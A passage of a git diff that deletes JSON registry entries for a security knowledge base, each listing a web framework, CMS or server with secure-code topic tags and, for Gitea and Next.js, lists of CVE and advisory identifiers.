-  "system_id": "caddy",
-  "display_name": "Caddy",
-  "category": "servers",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/servers/caddy",
-  "secure_code_topics": [
-    "proxy-trust-boundary",
-    "request-smuggling-boundary"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/directus.json b/08-threat-intel/registry/systems/directus.json
deleted file mode 100644
index 08102242..00000000
--- a/08-threat-intel/registry/systems/directus.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "directus",
-  "display_name": "Directus",
-  "category": "cms",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/cms/directus",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "token-cookie-storage",
-    "file-upload-validation"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/discourse.json b/08-threat-intel/registry/systems/discourse.json
deleted file mode 100644
index 922048e2..00000000
--- a/08-threat-intel/registry/systems/discourse.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "discourse",
-  "display_name": "Discourse",
-  "category": "cms",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/cms/discourse",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "xss-output-encoding",
-    "plugin-extension-trust-policy"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/django.json b/08-threat-intel/registry/systems/django.json
deleted file mode 100644
index 002208b2..00000000
--- a/08-threat-intel/registry/systems/django.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "django",
-  "display_name": "Django",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/django",
-  "secure_code_topics": [
-    "xss-output-encoding",
-    "path-traversal-guard",
-    "file-upload-validation"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/drupal.json b/08-threat-intel/registry/systems/drupal.json
deleted file mode 100644
index f417c763..00000000
--- a/08-threat-intel/registry/systems/drupal.json
+++ /dev/null
@@ -1,22 +0,0 @@
-{
-  "system_id": "drupal",
-  "display_name": "Drupal",
-  "category": "cms",
-  "tier": "history-full",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/cms/drupal",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "xss-output-encoding",
-    "file-upload-validation",
-    "plugin-extension-trust-policy"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/echo.json b/08-threat-intel/registry/systems/echo.json
deleted file mode 100644
index b9b445b0..00000000
--- a/08-threat-intel/registry/systems/echo.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
-  "system_id": "echo",
-  "display_name": "Echo",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/echo",
-  "secure_code_topics": [
-    "proxy-trust-boundary",
-    "token-cookie-storage"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/esbuild.json b/08-threat-intel/registry/systems/esbuild.json
deleted file mode 100644
index 26fc3352..00000000
--- a/08-threat-intel/registry/systems/esbuild.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
-  "system_id": "esbuild",
-  "display_name": "esbuild",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/esbuild",
-  "secure_code_topics": [
-    "dependency-upgrade-policy",
-    "file-upload-validation"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/express.json b/08-threat-intel/registry/systems/express.json
deleted file mode 100644
index d10a4dd6..00000000
--- a/08-threat-intel/registry/systems/express.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "express",
-  "display_name": "Express",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/express",
-  "secure_code_topics": [
-    "xss-output-encoding",
-    "ssrf-url-validation",
-    "proxy-trust-boundary"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/fastify.json b/08-threat-intel/registry/systems/fastify.json
deleted file mode 100644
index 7e585b2b..00000000
--- a/08-threat-intel/registry/systems/fastify.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "fastify",
-  "display_name": "Fastify",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/fastify",
-  "secure_code_topics": [
-    "proxy-trust-boundary",
-    "ssrf-url-validation",
-    "xss-output-encoding"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/flask.json b/08-threat-intel/registry/systems/flask.json
deleted file mode 100644
index 551472f0..00000000
--- a/08-threat-intel/registry/systems/flask.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "flask",
-  "display_name": "Flask",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/flask",
-  "secure_code_topics": [
-    "xss-output-encoding",
-    "ssrf-url-validation",
-    "token-cookie-storage"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/ghost.json b/08-threat-intel/registry/systems/ghost.json
deleted file mode 100644
index bd37e424..00000000
--- a/08-threat-intel/registry/systems/ghost.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "ghost",
-  "display_name": "Ghost",
-  "category": "cms",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/cms/ghost",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "xss-output-encoding",
-    "token-cookie-storage"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/gin.json b/08-threat-intel/registry/systems/gin.json
deleted file mode 100644
index 36f2fe41..00000000
--- a/08-threat-intel/registry/systems/gin.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
-  "system_id": "gin",
-  "display_name": "Gin",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/gin",
-  "secure_code_topics": [
-    "proxy-trust-boundary",
-    "xss-output-encoding"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/gitea.json b/08-threat-intel/registry/systems/gitea.json
deleted file mode 100644
index a946013d..00000000
--- a/08-threat-intel/registry/systems/gitea.json
+++ /dev/null
@@ -1,59 +0,0 @@
-{
-  "system_id": "gitea",
-  "display_name": "Gitea",
-  "category": "platforms",
-  "tier": "rolling-24m",
-  "total": 37,
-  "markdown_cases": 37,
-  "triage_count": 0,
-  "latest_update": "2026-03-03T04:57:57.697708Z",
-  "output_dir": "07-framework-security/platforms/gitea",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "token-cookie-storage",
-    "proxy-trust-boundary"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 1,
-  "manual_count": 36,
-  "items": [
-    "gitea--CVE-2026-0798",
-    "gitea--CVE-2026-20736",
-    "gitea--CVE-2026-20750",
-    "gitea--CVE-2026-20800",
-    "gitea--CVE-2026-20883",
-    "gitea--CVE-2026-20888",
-    "gitea--CVE-2026-20897",
-    "gitea--CVE-2026-20904",
-    "gitea--CVE-2026-20912",
-    "gitea--CVE-2025-69413",
-    "gitea--CVE-2025-68938",
-    "gitea--CVE-2025-68939",
-    "gitea--CVE-2025-68940",
-    "gitea--CVE-2025-68941",
-    "gitea--CVE-2025-68942",
-    "gitea--CVE-2025-68943",
-    "gitea--CVE-2025-68944",
-    "gitea--CVE-2025-68945",
-    "gitea--CVE-2025-68946",
-    "gitea--CVE-2022-42968",
-    "gitea--CVE-2021-45330",
-    "gitea--CVE-2018-18926",
-    "gitea--CVE-2020-13246",
-    "gitea--CVE-2021-28378",
-    "gitea--CVE-2022-0905",
-    "gitea--CVE-2022-1928",
-    "gitea--CVE-2022-27313",
-    "gitea--CVE-2022-30781",
-    "gitea--CVE-2021-29134",
-    "gitea--CVE-2021-45331",
-    "gitea--CVE-2021-45327",
-    "gitea--CVE-2022-38795",
-    "gitea--CVE-2018-15192",
-    "gitea--CVE-2019-1010261",
-    "gitea--CVE-2022-38183",
-    "gitea--CVE-2021-3382",
-    "gitea--CVE-2022-1058"
-  ]
-}
diff --git a/08-threat-intel/registry/systems/gitlab-ce.json b/08-threat-intel/registry/systems/gitlab-ce.json
deleted file mode 100644
index e5fb3c46..00000000
--- a/08-threat-intel/registry/systems/gitlab-ce.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "gitlab-ce",
-  "display_name": "GitLab CE",
-  "category": "platforms",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/platforms/gitlab-ce",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "token-cookie-storage",
-    "deserialization-safety"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/grafana.json b/08-threat-intel/registry/systems/grafana.json
deleted file mode 100644
index 00bf1f78..00000000
--- a/08-threat-intel/registry/systems/grafana.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "grafana",
-  "display_name": "Grafana",
-  "category": "platforms",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/platforms/grafana",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "plugin-extension-trust-policy",
-    "xss-output-encoding"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/hapi.json b/08-threat-intel/registry/systems/hapi.json
deleted file mode 100644
index 97df7ece..00000000
--- a/08-threat-intel/registry/systems/hapi.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
-  "system_id": "hapi",
-  "display_name": "Hapi",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/hapi",
-  "secure_code_topics": [
-    "proxy-trust-boundary",
-    "token-cookie-storage"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/haproxy.json b/08-threat-intel/registry/systems/haproxy.json
deleted file mode 100644
index a3836bd0..00000000
--- a/08-threat-intel/registry/systems/haproxy.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
-  "system_id": "haproxy",
-  "display_name": "HAProxy",
-  "category": "servers",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/servers/haproxy",
-  "secure_code_topics": [
-    "proxy-trust-boundary",
-    "request-smuggling-boundary"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/jenkins.json b/08-threat-intel/registry/systems/jenkins.json
deleted file mode 100644
index 14ba8f9b..00000000
--- a/08-threat-intel/registry/systems/jenkins.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "jenkins",
-  "display_name": "Jenkins",
-  "category": "platforms",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/platforms/jenkins",
-  "secure_code_topics": [
-    "plugin-extension-trust-policy",
-    "authz-server-side-recheck",
-    "deserialization-safety"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/joomla.json b/08-threat-intel/registry/systems/joomla.json
deleted file mode 100644
index 63c96c3d..00000000
--- a/08-threat-intel/registry/systems/joomla.json
+++ /dev/null
@@ -1,22 +0,0 @@
-{
-  "system_id": "joomla",
-  "display_name": "Joomla",
-  "category": "cms",
-  "tier": "history-full",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/cms/joomla",
-  "secure_code_topics": [
-    "xss-output-encoding",
-    "file-upload-validation",
-    "path-traversal-guard",
-    "plugin-extension-trust-policy"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/kibana.json b/08-threat-intel/registry/systems/kibana.json
deleted file mode 100644
index dfd454b1..00000000
--- a/08-threat-intel/registry/systems/kibana.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "kibana",
-  "display_name": "Kibana",
-  "category": "platforms",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/platforms/kibana",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "xss-output-encoding",
-    "proxy-trust-boundary"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/koa.json b/08-threat-intel/registry/systems/koa.json
deleted file mode 100644
index 4558494a..00000000
--- a/08-threat-intel/registry/systems/koa.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
-  "system_id": "koa",
-  "display_name": "Koa",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/koa",
-  "secure_code_topics": [
-    "proxy-trust-boundary",
-    "ssrf-url-validation"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/laravel.json b/08-threat-intel/registry/systems/laravel.json
deleted file mode 100644
index f04a58ab..00000000
--- a/08-threat-intel/registry/systems/laravel.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "laravel",
-  "display_name": "Laravel",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/laravel",
-  "secure_code_topics": [
-    "xss-output-encoding",
-    "authz-server-side-recheck",
-    "file-upload-validation"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/magento-open-source.json b/08-threat-intel/registry/systems/magento-open-source.json
deleted file mode 100644
index c7c3b1d7..00000000
--- a/08-threat-intel/registry/systems/magento-open-source.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "magento-open-source",
-  "display_name": "Magento Open Source",
-  "category": "ecommerce",
-  "tier": "history-full",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/ecommerce/magento-open-source",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "file-upload-validation",
-    "plugin-extension-trust-policy"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/mattermost.json b/08-threat-intel/registry/systems/mattermost.json
deleted file mode 100644
index 475bc17a..00000000
--- a/08-threat-intel/registry/systems/mattermost.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "mattermost",
-  "display_name": "Mattermost",
-  "category": "platforms",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/platforms/mattermost",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "xss-output-encoding",
-    "token-cookie-storage"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/mediawiki.json b/08-threat-intel/registry/systems/mediawiki.json
deleted file mode 100644
index d3e461bf..00000000
--- a/08-threat-intel/registry/systems/mediawiki.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "mediawiki",
-  "display_name": "MediaWiki",
-  "category": "cms",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/cms/mediawiki",
-  "secure_code_topics": [
-    "xss-output-encoding",
-    "authz-server-side-recheck",
-    "file-upload-validation"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/medusa.json b/08-threat-intel/registry/systems/medusa.json
deleted file mode 100644
index 126ad491..00000000
--- a/08-threat-intel/registry/systems/medusa.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
-  "system_id": "medusa",
-  "display_name": "Medusa",
-  "category": "ecommerce",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/ecommerce/medusa",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "token-cookie-storage"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/moodle.json b/08-threat-intel/registry/systems/moodle.json
deleted file mode 100644
index 3bec4c00..00000000
--- a/08-threat-intel/registry/systems/moodle.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "moodle",
-  "display_name": "Moodle",
-  "category": "cms",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/cms/moodle",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "xss-output-encoding",
-    "file-upload-validation"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/nestjs.json b/08-threat-intel/registry/systems/nestjs.json
deleted file mode 100644
index 8a11da0a..00000000
--- a/08-threat-intel/registry/systems/nestjs.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "nestjs",
-  "display_name": "NestJS",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/nestjs",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "token-cookie-storage",
-    "ssrf-url-validation"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/nextjs.json b/08-threat-intel/registry/systems/nextjs.json
deleted file mode 100644
index 79896081..00000000
--- a/08-threat-intel/registry/systems/nextjs.json
+++ /dev/null
@@ -1,48 +0,0 @@
-{
-  "system_id": "nextjs",
-  "display_name": "Next.js",
-  "category": "frameworks",
-  "tier": "history-full",
-  "total": 26,
-  "markdown_cases": 26,
-  "triage_count": 0,
-  "latest_update": "2026-03-13T22:14:13.665535Z",
-  "output_dir": "07-framework-security/frameworks/nextjs",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "proxy-trust-boundary",
-    "token-cookie-storage"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 26,
-  "items": [
-    "nextjs--GHSA-h25m-26qc-wcjf",
-    "nextjs--CVE-2025-59472",
-    "nextjs--CVE-2025-59471",
-    "nextjs--GHSA-5j59-xgg2-r9c4",
-    "nextjs--GHSA-w37m-7fhw-fmv9",
-    "nextjs--GHSA-mwv6-3258-q52c",
-    "nextjs--GHSA-9qr9-h5gf-34mp",
-    "nextjs--CVE-2025-57752",
-    "nextjs--CVE-2025-55173",
-    "nextjs--CVE-2025-57822",
-    "nextjs--CVE-2025-49826",
-    "nextjs--CVE-2025-49005",
-    "nextjs--CVE-2025-48068",
-    "nextjs--CVE-2025-32421",
-    "nextjs--CVE-2025-30218",
-    "nextjs--CVE-2025-29927",
-    "nextjs--CVE-2024-56332",
-    "nextjs--CVE-2024-51479",
-    "nextjs--CVE-2024-47831",
-    "nextjs--CVE-2024-46982",
-    "nextjs--CVE-2024-34351",
-    "nextjs--CVE-2021-43803",
-    "nextjs--CVE-2021-39178",
-    "nextjs--CVE-2021-37699",
-    "nextjs--CVE-2020-15242",
-    "nextjs--CVE-2020-5284"
-  ]
-}
diff --git a/08-threat-intel/registry/systems/nginx.json b/08-threat-intel/registry/systems/nginx.json
deleted file mode 100644
index 9f7c93be..00000000
--- a/08-threat-intel/registry/systems/nginx.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "nginx",
-  "display_name": "Nginx",
-  "category": "servers",
-  "tier": "history-full",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/servers/nginx",
-  "secure_code_topics": [
-    "proxy-trust-boundary",
-    "request-smuggling-boundary",
-    "csp-trusted-types"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/nodejs.json b/08-threat-intel/registry/systems/nodejs.json
deleted file mode 100644
index b12919aa..00000000
--- a/08-threat-intel/registry/systems/nodejs.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "nodejs",
-  "display_name": "Node.js",
-  "category": "frameworks",
-  "tier": "history-full",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/nodejs",
-  "secure_code_topics": [
-    "ssrf-url-validation",
-    "request-smuggling-boundary",
-    "dependency-upgrade-policy"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/nuxt.json b/08-threat-intel/registry/systems/nuxt.json
deleted file mode 100644
index 4eb4df5b..00000000
--- a/08-threat-intel/registry/systems/nuxt.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "nuxt",
-  "display_name": "Nuxt",
-  "category": "frameworks",
-  "tier": "history-full",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/nuxt",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "proxy-trust-boundary",
-    "token-cookie-storage"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/opencart.json b/08-threat-intel/registry/systems/opencart.json
deleted file mode 100644
index ad6658a7..00000000
--- a/08-threat-intel/registry/systems/opencart.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "opencart",
-  "display_name": "OpenCart",
-  "category": "ecommerce",
-  "tier": "history-full",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/ecommerce/opencart",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "plugin-extension-trust-policy",
-    "file-upload-validation"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/openmage.json b/08-threat-intel/registry/systems/openmage.json
deleted file mode 100644
index a6e7c5e1..00000000
--- a/08-threat-intel/registry/systems/openmage.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
-  "system_id": "openmage",
-  "display_name": "OpenMage / Mage-OS",
-  "category": "ecommerce",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/ecommerce/openmage",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "plugin-extension-trust-policy"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/phpmyadmin.json b/08-threat-intel/registry/systems/phpmyadmin.json
deleted file mode 100644
index e692c86f..00000000
--- a/08-threat-intel/registry/systems/phpmyadmin.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "phpmyadmin",
-  "display_name": "phpMyAdmin",
-  "category": "platforms",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/platforms/phpmyadmin",
-  "secure_code_topics": [
-    "xss-output-encoding",
-    "authz-server-side-recheck",
-    "path-traversal-guard"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/prestashop.json b/08-threat-intel/registry/systems/prestashop.json
deleted file mode 100644
index 7543550e..00000000
--- a/08-threat-intel/registry/systems/prestashop.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "prestashop",
-  "display_name": "PrestaShop",
-  "category": "ecommerce",
-  "tier": "history-full",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/ecommerce/prestashop",
-  "secure_code_topics": [
-    "plugin-extension-trust-policy",
-    "authz-server-side-recheck",
-    "file-upload-validation"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/rails.json b/08-threat-intel/registry/systems/rails.json
deleted file mode 100644
index 27b69711..00000000
--- a/08-threat-intel/registry/systems/rails.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "rails",
-  "display_name": "Ruby on Rails",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/rails",
-  "secure_code_topics": [
-    "xss-output-encoding",
-    "file-upload-validation",
-    "authz-server-side-recheck"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/react.json b/08-threat-intel/registry/systems/react.json
deleted file mode 100644
index 8b5ca1a5..00000000
--- a/08-threat-intel/registry/systems/react.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "react",
-  "display_name": "React",
-  "category": "frameworks",
-  "tier": "history-full",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/react",
-  "secure_code_topics": [
-    "xss-output-encoding",
-    "dom-sink-hardening",
-    "csp-trusted-types"
-  ],
